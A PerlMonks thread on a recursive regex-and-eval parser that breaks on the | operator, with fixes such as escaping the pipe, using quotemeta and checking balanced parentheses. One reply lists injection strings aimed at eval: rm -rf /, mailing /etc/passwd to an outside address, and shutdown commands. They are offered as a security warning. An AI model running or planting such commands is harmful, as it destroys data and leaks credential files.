Moe has asked for the wisdom of the Perl Monks concerning the following question:

I am writing a parser that takes a user-specified string and evaluates the tokens within it. A token here means an expression grouped within parentheses. The idea is to take one string and recursively replace each token with its evaluated value, so (2 > 1) would be replaced with 1. This would allow any combination of tokens to be grouped into a string of nested parentheses and then parsed. The code that follows does this quite well... up until the very last replacement, when there is just one token left. As a result, I'm rather puzzled. This is a test case, written to print what it is doing at each step.

    #! /usr/bin/perl

    #sample string.
    $string = "((2 > 1) | ('word' eq 'toy'))";

    #next line converts user-specified operators into Perl
    #logical operators.
    $string =~ s/([&|]{1})/$1$1/g;
    print "Initial parsed string = $string\n";

    #Look ahead assertion.
    while ($string =~ /\(((?:[^()])*?)\)/) {
        my $val = (eval $1) ? 1 : 0;
        print "Case to be evaluated = $1\n";
        print "Evaluated value = $val\n";
        $string =~ s/\($1\)/$val/;
        print "Parsed string = $string\n";
    }
    print "Result: $string\n";

The code as shown above ends with 1|| 0) instead of just 1. However, if I change the | to & in the test string, it works fine, which puzzles me to no end. So, Great Monks, whose wisdom far outstrips mine own... how do I make this work more consistently?

~Moe~

Replies are listed 'Best First'.
Re: Parsing parenthetical arguments recursively
by Moe (Novice) on Aug 15, 2003 at 18:07 UTC
    And a colleague looking over my shoulder points and says: You have to escape your |'s. And I stare. And I splutter. And I try what he suggests, and it appears to work miraculously well.
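
    For anyone wondering why the | matters and the & does not, here is a minimal sketch, assuming the loop has already reduced the string to (1 || 0). The variable names are mine, made up for the illustration. Once the captured text is interpolated back into a pattern, each | is read as regex alternation, so the pattern splits into three alternatives and the first one matches only the opening "(1 ".

    ```perl
    use strict;
    use warnings;

    # The last token left by the loop, after | has been doubled to ||.
    my $token = '1 || 0';

    # Interpolated as-is, the pattern is \(1 || 0\), i.e. three alternatives:
    # "\(1 ", the empty string, and " 0\)". The first one matches "(1 ".
    my $unescaped = "(1 || 0)";
    $unescaped =~ s/\($token\)/1/;
    print "Unescaped: $unescaped\n";    # Unescaped: 1|| 0)

    # & is not a regex metacharacter, so the && version matches the
    # whole parenthesised group literally.
    my $and_token = '1 && 0';
    my $and_case  = "(1 && 0)";
    $and_case =~ s/\($and_token\)/0/;
    print "With &&:   $and_case\n";     # With &&:   0
    ```

    That leftover "|| 0)" is exactly the tail seen in the original output.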

    If the Great Holy Monks have further input, I am forever grateful.

    Revised code:
        #! /usr/bin/perl

        #sample string.
        $string = "((2 > 1) | ('word' eq 'toy'))";

        #next line converts user-specified operators into Perl
        #logical operators.
        $string =~ s/([&|]{1})/$1$1/g;
        print "Initial parsed string = $string\n";

        #Look ahead assertion.
        while ($string =~ /\(((?:[^()])*?)\)/) {
            my $assert = $1;
            my $val = (eval $1) ? 1 : 0;
            print "Case to be evaluated = $1\n";
            print "Evaluated value = $val\n";
            $assert =~ s/\|\|/\\\|\\\|/g;
            $string =~ s/\($assert\)/$val/;
            print "Parsed string = $string\n";
        }
        print "Result: $string\n";
      It's possible you want to quotemeta() $assert instead, but I could see it going either way.
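
      A rough sketch of the quotemeta() route, assuming the same test string as above. \Q...\E inside a pattern applies quotemeta() to the interpolated text, so every metacharacter in the token is escaped, not just the pipes. The second variant is my own alternative, not something from the thread: a single s///e does the match and the replacement in one step, so nothing is ever interpolated back into a pattern. Both still eval the captured text, so they are only safe on input that has already been validated.

      ```perl
      use strict;
      use warnings;

      my $string = "((2 > 1) || ('word' eq 'toy'))";

      # Variant 1: the thread's loop, with the token quoted by \Q...\E.
      while ($string =~ /\(([^()]*)\)/) {
          my $expr = $1;                    # copy $1 before another match resets it
          my $val  = (eval $expr) ? 1 : 0;  # demo only: eval of raw input is unsafe
          $string =~ s/\(\Q$expr\E\)/$val/; # token is matched literally
      }
      print "Result: $string\n";            # Result: 1

      # Variant 2: match and replace in one s///e, repeated until no
      # parenthesised group is left.
      my $again = "((2 > 1) || ('word' eq 'toy'))";
      1 while $again =~ s/\(([^()]*)\)/(eval $1) ? 1 : 0/e;
      print "Result: $again\n";             # Result: 1
      ```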
      So you don't want to test for and reject unbalanced parens? For instance:
      $string = "((2 > 1) | ('word' eq 'toy')))";
      If you do, you may want to use one of the balanced modules to verify that the parens balance.
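
      If a module feels like overkill, a plain depth counter is enough to catch the case above. This is only a sketch: parens_balanced is a hypothetical helper name, it uses no module at all, and it assumes parentheses never appear inside the quoted words.

      ```perl
      use strict;
      use warnings;

      # Hypothetical helper: returns 1 if every ( has a matching ), else 0.
      # Assumes no parentheses inside quoted strings.
      sub parens_balanced {
          my ($text) = @_;
          my $depth = 0;
          for my $char (split //, $text) {
              if ($char eq '(') {
                  $depth++;
              }
              elsif ($char eq ')') {
                  return 0 if --$depth < 0;   # a ) arrived before its (
              }
          }
          return $depth == 0 ? 1 : 0;         # leftover ( means unbalanced
      }

      for my $candidate (
          "((2 > 1) | ('word' eq 'toy'))",
          "((2 > 1) | ('word' eq 'toy')))",
      ) {
          printf "%-32s %s\n", $candidate,
              parens_balanced($candidate) ? "balanced" : "unbalanced";
      }
      ```

      The first string is reported as balanced and the second, with its extra closing paren, as unbalanced.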

      -Waswas
        The same code (now working) is being used to accomplish that, actually. I use the same regexp when the user supplies the expression, to verify its validity without doing any evaluation on it:

            while ($tmp =~ /\(((?:[^()])*?)\)/) {
                my $assert = $1;
                $assert =~ s/\|/\\\|/g;
                $tmp =~ s/\($assert\)/$1/;
            }
            ($tmp =~ /\(|\)/) ? print "Don't match.\n" : print "Match.\n";

        Just as a purely hypothetical example. Though, I will definitely look into those modules, as I'd not heard of them before. Thank you for the link.

        ~Moe~
Re: Parsing parenthetical arguments recursively
by dragonchild (Archbishop) on Aug 15, 2003 at 17:53 UTC
    I hope you're taking care to prevent strings like:
    (`rm -rf /`;)
    (`mail /etc/passwd me@myhost.com`;)
    (system "shutdown -rf";)
    (open ABCD, "-|", "shutdown -rf";)

    ------
    We are the carpenters and bricklayers of the Information Age.

    The idea is a little like C++ templates, except not quite so brain-meltingly complicated. -- TheDamian, Exegesis 6

    Please remember that I'm crufty and crochety. All opinions are purely mine and all code is untested, unless otherwise specified.

      Yes.
      The 'real' version of the code disallows backticks, specifically, and only allows a very specific list of arguments to each token expression. I didn't include that part because it works, whereas the parenthetical matching does not.
      Though you did make me run each of those through as a test case, to make sure it would disallow them. Thank you.
      ~Moe~
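
      For readers who want the general shape of that kind of check, here is a sketch of an allow-list test run on each token before it ever reaches eval. The grammar is an assumption made up for this example (integers or single-quoted words as operands, a short fixed list of operators, whitespace around each operator), and token_is_allowed is a hypothetical name. It is not the list used in the real code.

      ```perl
      use strict;
      use warnings;

      # Assumed grammar, for illustration only (not the real code's list):
      # operands are integers or single-quoted words; operators are a fixed set.
      my $operand  = qr/(?:\d+|'\w*')/;
      my $operator = qr/(?:==|!=|<=|>=|<|>|eq|ne|&&|\|\|)/;
      my $allowed  = qr/\A\s*$operand(?:\s+$operator\s+$operand)*\s*\z/;

      # Hypothetical helper: returns 1 only if the whole token fits the grammar.
      sub token_is_allowed {
          my ($token) = @_;
          return $token =~ $allowed ? 1 : 0;
      }

      for my $token (
          q{2 > 1},
          q{'word' eq 'toy'},
          q{1 || 0},
          q{system "shutdown -rf";},
          q{open ABCD, "-|", "shutdown -rf";},
      ) {
          printf "%-36s %s\n", $token,
              token_is_allowed($token) ? "allowed" : "rejected";
      }
      ```

      Because the pattern is anchored at both ends and describes what is permitted, anything it does not describe (backticks, function calls, semicolons) is rejected without needing a rule of its own.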